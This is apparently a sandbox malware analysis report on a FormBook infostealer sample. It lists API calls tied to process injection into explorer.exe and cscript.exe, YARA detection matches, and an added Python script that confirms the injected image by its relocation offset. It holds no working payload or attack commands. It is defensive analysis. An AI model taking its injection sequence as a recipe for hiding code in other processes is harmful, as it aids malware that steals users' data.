              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_0041A490 NtClose
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_0041A540 NtAllocateVirtualMemory
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_0041A40B NtReadFile
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_0041A48A NtClose
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_01102B60 NtClose, LdrInitializeThunk
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_01102BF0 NtAllocateVirtualMemory, LdrInitializeThunk
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_01102AD0 NtReadFile, LdrInitializeThunk
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_01102D10 NtMapViewOfSection, LdrInitializeThunk
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_01102D30 NtUnmapViewOfSection, LdrInitializeThunk
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_01102DD0 NtDelayExecution, LdrInitializeThunk
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_01102DF0 NtQuerySystemInformation, LdrInitializeThunk
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_01102C70 NtFreeVirtualMemory, LdrInitializeThunk
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_01102CA0 NtQueryInformationToken, LdrInitializeThunk
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_01102F30 NtCreateSection, LdrInitializeThunk
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_01102F90 NtProtectVirtualMemory, LdrInitializeThunk
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_01102FB0 NtResumeThread, LdrInitializeThunk
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_01102FE0 NtCreateFile, LdrInitializeThunk
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_01102E80 NtReadVirtualMemory, LdrInitializeThunk
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_01102EA0 NtAdjustPrivilegesToken, LdrInitializeThunk
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_01104340 NtSetContextThread
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_01104650 NtSuspendThread
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_01102B80 NtQueryInformationFile
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_01102BA0 NtEnumerateValueKey
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_01102BE0 NtQueryValueKey
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_01102AB0 NtWaitForSingleObject
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_01102AF0 NtWriteFile
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_01102D00 NtSetInformationFile
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_01102DB0 NtEnumerateKey
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_01102C00 NtQueryInformationProcess
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_01102C60 NtCreateKey
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_01102CC0 NtQueryVirtualMemory
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_01102CF0 NtOpenProcess
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_01102F60 NtCreateProcessEx
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_01102FA0 NtQuerySection
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_01102E30 NtWriteVirtualMemory
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_01102EE0 NtQueueApcThread
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_01103010 NtOpenDirectoryObject
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_01103090 NtSetValueKey
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_011035C0 NtCreateMutant
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_011039B0 NtGetContextThread
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_01103D10 NtOpenProcessToken
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_01103D70 NtOpenThread
              Source: C:\Windows\explorer.exe; Code function: 4_2_10EB1232 NtCreateFile
              Source: C:\Windows\explorer.exe; Code function: 4_2_10EB2E12 NtProtectVirtualMemory
              Source: C:\Windows\explorer.exe; Code function: 4_2_10EB2E0A NtProtectVirtualMemory
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04BD2CA0 NtQueryInformationToken, LdrInitializeThunk
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04BD2C70 NtFreeVirtualMemory, LdrInitializeThunk
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04BD2C60 NtCreateKey, LdrInitializeThunk
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04BD2DF0 NtQuerySystemInformation, LdrInitializeThunk
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04BD2DD0 NtDelayExecution, LdrInitializeThunk
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04BD2D10 NtMapViewOfSection, LdrInitializeThunk
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04BD2EA0 NtAdjustPrivilegesToken, LdrInitializeThunk
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04BD2FE0 NtCreateFile, LdrInitializeThunk
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04BD2F30 NtCreateSection, LdrInitializeThunk
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04BD2AD0 NtReadFile, LdrInitializeThunk
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04BD2BF0 NtAllocateVirtualMemory, LdrInitializeThunk
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04BD2BE0 NtQueryValueKey, LdrInitializeThunk
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04BD2B60 NtClose, LdrInitializeThunk
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04BD35C0 NtCreateMutant, LdrInitializeThunk
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04BD4650 NtSuspendThread
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04BD4340 NtSetContextThread
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04BD2CF0 NtOpenProcess
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04BD2CC0 NtQueryVirtualMemory
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04BD2C00 NtQueryInformationProcess
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04BD2DB0 NtEnumerateKey
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04BD2D30 NtUnmapViewOfSection
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04BD2D00 NtSetInformationFile
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04BD2E80 NtReadVirtualMemory
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04BD2EE0 NtQueueApcThread
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04BD2E30 NtWriteVirtualMemory
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04BD2FB0 NtResumeThread
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04BD2FA0 NtQuerySection
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04BD2F90 NtProtectVirtualMemory
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04BD2F60 NtCreateProcessEx
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04BD2AB0 NtWaitForSingleObject
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04BD2AF0 NtWriteFile
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04BD2BA0 NtEnumerateValueKey
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04BD2B80 NtQueryInformationFile
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04BD3090 NtSetValueKey
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04BD3010 NtOpenDirectoryObject
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04BD3D10 NtOpenProcessToken
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04BD3D70 NtOpenThread
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04BD39B0 NtGetContextThread
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_027CA360 NtCreateFile
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_027CA410 NtReadFile
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_027CA490 NtClose
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_027CA540 NtAllocateVirtualMemory
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_027CA40B NtReadFile
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_027CA48A NtClose
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04A4A036 NtQueryInformationProcess, NtSuspendThread, NtSetContextThread, RtlQueueApcWow64Thread, NtResumeThread
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04A49BAF NtCreateSection, NtMapViewOfSection, NtMapViewOfSection, NtUnmapViewOfSection, NtClose
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04A4A042 NtQueryInformationProcess
              Source: C:\Windows\SysWOW64\cscript.exe; Code function: 5_2_04A49BB2 NtCreateSection, NtMapViewOfSection, NtMapViewOfSection
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04B9EA805_2_04B9EA80
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C56BD75_2_04C56BD7
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C5AB405_2_04C5AB40
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04B914605_2_04B91460
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C5F43F5_2_04C5F43F
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C695C35_2_04C695C3
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C3D5B05_2_04C3D5B0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C575715_2_04C57571
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C516CC5_2_04C516CC
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BE56305_2_04BE5630
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C5F7B05_2_04C5F7B0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C4F0CC5_2_04C4F0CC
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C5F0E05_2_04C5F0E0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C570E95_2_04C570E9
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BA70C05_2_04BA70C0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BAB1B05_2_04BAB1B0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C6B16B5_2_04C6B16B
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04B8F1725_2_04B8F172
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BD516C5_2_04BD516C
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BA52A05_2_04BA52A0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C412ED5_2_04C412ED
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BBB2C05_2_04BBB2C0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BE739A5_2_04BE739A
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C5132D5_2_04C5132D
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04B8D34C5_2_04B8D34C
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C5FCF25_2_04C5FCF2
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C19C325_2_04C19C32
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BBFDC05_2_04BBFDC0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C51D5A5_2_04C51D5A
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C57D735_2_04C57D73
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BA3D405_2_04BA3D40
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BA9EB05_2_04BA9EB0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BA1F925_2_04BA1F92
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04B63FD55_2_04B63FD5
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04B63FD25_2_04B63FD2
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C5FFB15_2_04C5FFB1
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C5FF095_2_04C5FF09
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BA38E05_2_04BA38E0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C0D8005_2_04C0D800
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C359105_2_04C35910
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BA99505_2_04BA9950
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BBB9505_2_04BBB950
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C4DAC65_2_04C4DAC6
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BE5AA05_2_04BE5AA0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C41AA35_2_04C41AA3
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C3DAAC5_2_04C3DAAC
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C57A465_2_04C57A46
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C5FA495_2_04C5FA49
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C13A6C5_2_04C13A6C
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C15BF05_2_04C15BF0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BBFB805_2_04BBFB80
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BDDBF95_2_04BDDBF9
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C5FB765_2_04C5FB76
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_027CE5585_2_027CE558
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_027CD5A65_2_027CD5A6
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_027CD8A35_2_027CD8A3
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_027CD99C5_2_027CD99C
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_027B9E505_2_027B9E50
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_027B9E4D5_2_027B9E4D
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_027B2FB05_2_027B2FB0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_027B2D905_2_027B2D90
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04A4A0365_2_04A4A036
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04A4E5CD5_2_04A4E5CD
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04A42D025_2_04A42D02
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04A410825_2_04A41082
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04A489125_2_04A48912
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04A4B2325_2_04A4B232
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04A45B305_2_04A45B30
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04A45B325_2_04A45B32
               Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe | Code function: String function: 0114F290 appears 105 times
               Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe | Code function: String function: 010BB970 appears 280 times
               Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe | Code function: String function: 01105130 appears 58 times
               Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe | Code function: String function: 01117E54 appears 111 times
               Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe | Code function: String function: 0113EA12 appears 86 times
               Source: C:\Windows\SysWOW64\cscript.exe | Code function: String function: 04C1F290 appears 105 times
               Source: C:\Windows\SysWOW64\cscript.exe | Code function: String function: 04BD5130 appears 58 times
               Source: C:\Windows\SysWOW64\cscript.exe | Code function: String function: 04BE7E54 appears 111 times
               Source: C:\Windows\SysWOW64\cscript.exe | Code function: String function: 04B8B970 appears 280 times
               Source: C:\Windows\SysWOW64\cscript.exe | Code function: String function: 04C0EA12 appears 86 times
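The ten "String function" lines above carry a check worth making explicit: the sample and cscript.exe each expose five heavily called string helpers with the same call counts (105, 280, 58, 111, 86), and every cscript.exe address is the matching sample address plus one constant. A constant shift means the same code image is mapped in cscript.exe at a different base, which is what the "Injects a PE file into a foreign processes" and FormBook YARA hits in both processes already imply; cscript.exe's own code would not line up this way. The script below is an added example, not part of the Joe Sandbox report or of the sample: it parses constructed copies of those lines, pairs functions by their call-count fingerprint (an assumption of this example, adequate here because each count is unique), and reports the delta only if every pair agrees. It tolerates both the separated and the fused "exeCode function" column form.

```python
import re
from collections import defaultdict

# Constructed from the report's "String function ... appears N times" lines
# (copied here as sample input, not read from a Joe Sandbox export).
REPORT_LINES = [
    r"Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe | Code function: String function: 0114F290 appears 105 times",
    r"Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe | Code function: String function: 010BB970 appears 280 times",
    r"Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe | Code function: String function: 01105130 appears 58 times",
    r"Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe | Code function: String function: 01117E54 appears 111 times",
    r"Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe | Code function: String function: 0113EA12 appears 86 times",
    r"Source: C:\Windows\SysWOW64\cscript.exe | Code function: String function: 04C1F290 appears 105 times",
    r"Source: C:\Windows\SysWOW64\cscript.exe | Code function: String function: 04BD5130 appears 58 times",
    r"Source: C:\Windows\SysWOW64\cscript.exe | Code function: String function: 04BE7E54 appears 111 times",
    r"Source: C:\Windows\SysWOW64\cscript.exe | Code function: String function: 04B8B970 appears 280 times",
    r"Source: C:\Windows\SysWOW64\cscript.exe | Code function: String function: 04C0EA12 appears 86 times",
]

# ".+?\.exe" stops at the source path; "\s*\|?\s*" accepts either a " | "
# separator or the fused "...exeCode function:" form seen in the extraction.
LINE_RE = re.compile(
    r"Source:\s+(?P<source>.+?\.exe)\s*\|?\s*Code function:\s+String function:\s+"
    r"(?P<addr>[0-9A-Fa-f]{8})\s+appears\s+(?P<count>\d+)\s+times"
)


def parse(lines):
    """Return {process_name: {call_count: [address, ...]}} from report lines."""
    out = defaultdict(lambda: defaultdict(list))
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue  # not a string-function line; ignore
        proc = m.group("source").rsplit("\\", 1)[-1]
        out[proc][int(m.group("count"))].append(int(m.group("addr"), 16))
    return out


def relocation_delta(parsed, proc_a, proc_b):
    """Pair functions by call-count fingerprint and test for one constant base shift.

    Returns (delta, pairs). delta is an int only when every fingerprint of
    proc_a has exactly one partner in proc_b and all pairs share the same
    shift; otherwise delta is None and pairs holds whatever did match.
    """
    pairs = []
    for count, addrs_a in parsed[proc_a].items():
        addrs_b = parsed[proc_b].get(count, [])
        if len(addrs_a) != 1 or len(addrs_b) != 1:
            continue  # ambiguous fingerprint: skip rather than guess a pairing
        pairs.append((count, addrs_a[0], addrs_b[0], addrs_b[0] - addrs_a[0]))
    deltas = {d for _, _, _, d in pairs}
    if pairs and len(pairs) == len(parsed[proc_a]) and len(deltas) == 1:
        return deltas.pop(), pairs
    return None, pairs


if __name__ == "__main__":
    parsed = parse(REPORT_LINES)
    delta, pairs = relocation_delta(parsed, "AB2hQJZ77ipdWem.exe", "cscript.exe")
    for count, a, b, d in sorted(pairs):
        print(f"{count:4d} calls  {a:08X} -> {b:08X}  shift 0x{d:X}")
    if delta is None:
        print("no consistent shift: the two processes do not share one relocated image")
    else:
        print(f"same image mapped in cscript.exe at base + 0x{delta:X}")
```

For this report the shift is 0x3AD0000 for all five functions. The same pairing idea applies to any two Joe Sandbox process entries that match the same YARA rule: if the disassembled function fingerprints line up under one constant, the second process is hosting the first one's payload.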
               Source: AB2hQJZ77ipdWem.exe | Binary or memory string: OriginalFilename vs AB2hQJZ77ipdWem.exe
               Source: AB2hQJZ77ipdWem.exe, 00000000.00000002.1391140026.0000000005A20000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameCAA.dll4 vs AB2hQJZ77ipdWem.exe
               Source: AB2hQJZ77ipdWem.exe, 00000000.00000002.1388754633.00000000042EE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs AB2hQJZ77ipdWem.exe
               Source: AB2hQJZ77ipdWem.exe, 00000000.00000002.1388307588.000000000315B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCAA.dll4 vs AB2hQJZ77ipdWem.exe
               Source: AB2hQJZ77ipdWem.exe, 00000000.00000002.1387280607.00000000013EE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs AB2hQJZ77ipdWem.exe
               Source: AB2hQJZ77ipdWem.exe, 00000000.00000002.1391961489.0000000007850000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs AB2hQJZ77ipdWem.exe
               Source: AB2hQJZ77ipdWem.exe, 00000003.00000002.1453363872.0000000001050000.00000040.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamecscript.exe` vs AB2hQJZ77ipdWem.exe
               Source: AB2hQJZ77ipdWem.exe, 00000003.00000002.1453117705.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamecscript.exe` vs AB2hQJZ77ipdWem.exe
               Source: AB2hQJZ77ipdWem.exe, 00000003.00000002.1453432661.00000000011BD000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs AB2hQJZ77ipdWem.exe
               Source: AB2hQJZ77ipdWem.exe | Binary or memory string: OriginalFilenamePGgp.exe6 vs AB2hQJZ77ipdWem.exe
               Source: AB2hQJZ77ipdWem.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
               Source: 3.2.AB2hQJZ77ipdWem.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
               Source: 3.2.AB2hQJZ77ipdWem.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
               Source: 3.2.AB2hQJZ77ipdWem.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
               Source: 3.2.AB2hQJZ77ipdWem.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
               Source: 3.2.AB2hQJZ77ipdWem.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
               Source: 3.2.AB2hQJZ77ipdWem.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
               Source: 00000004.00000002.3839526492.0000000010EC9000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
               Source: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
               Source: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
               Source: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
               Source: 00000005.00000002.3820022788.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
               Source: 00000005.00000002.3820022788.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
